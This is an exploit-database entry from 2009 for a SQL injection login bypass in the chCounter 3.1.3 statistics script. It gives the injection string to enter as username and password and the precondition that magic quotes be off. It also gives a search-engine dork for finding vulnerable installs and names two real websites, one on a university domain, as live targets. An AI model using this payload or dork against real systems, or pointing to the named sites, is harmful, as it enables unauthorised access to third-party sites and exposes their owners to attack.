chCounter 3.1.3 (Login Bypass) SQL Injection Vulnerability

2009-04-16T00:00:00
ID 1337DAY-ID-5054
Type zdt
Reporter tmh
Modified 2009-04-16T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==========================================================
chCounter 3.1.3 (Login Bypass) SQL Injection Vulnerability
==========================================================


########################################################################################################################
#chCounter 3.1.3 Login Bypass
#=======================================================================================================================
#
#Critical Level : Dangerous
#
#Vendor site : http://chcounter.org/
#
#Download : http://chcounter.org/chCounter3/getfile.php?id=5
#
#dorks: "chCounter 3.1.3" Kunftig automatisch einloggen or "chCounter 3.1.3"
#
#=======================================================================================================================
#
#
#Information :
#--------------------------------
#Need: magic quotes = off
#
#Exploit :
#--------------------------------
#
#http://www.[URL]//counter/stats/index.php
#
#Use or '=' as username and password
#
#
#Live demo :
#--------------------------------
#
#http://www.brummelliese.de/count/stats/
#http://www.fire.uni-freiburg.de/counter/welcome/stats/
#
#=======================================================================================================================



#  0day.today [2016-04-19]  #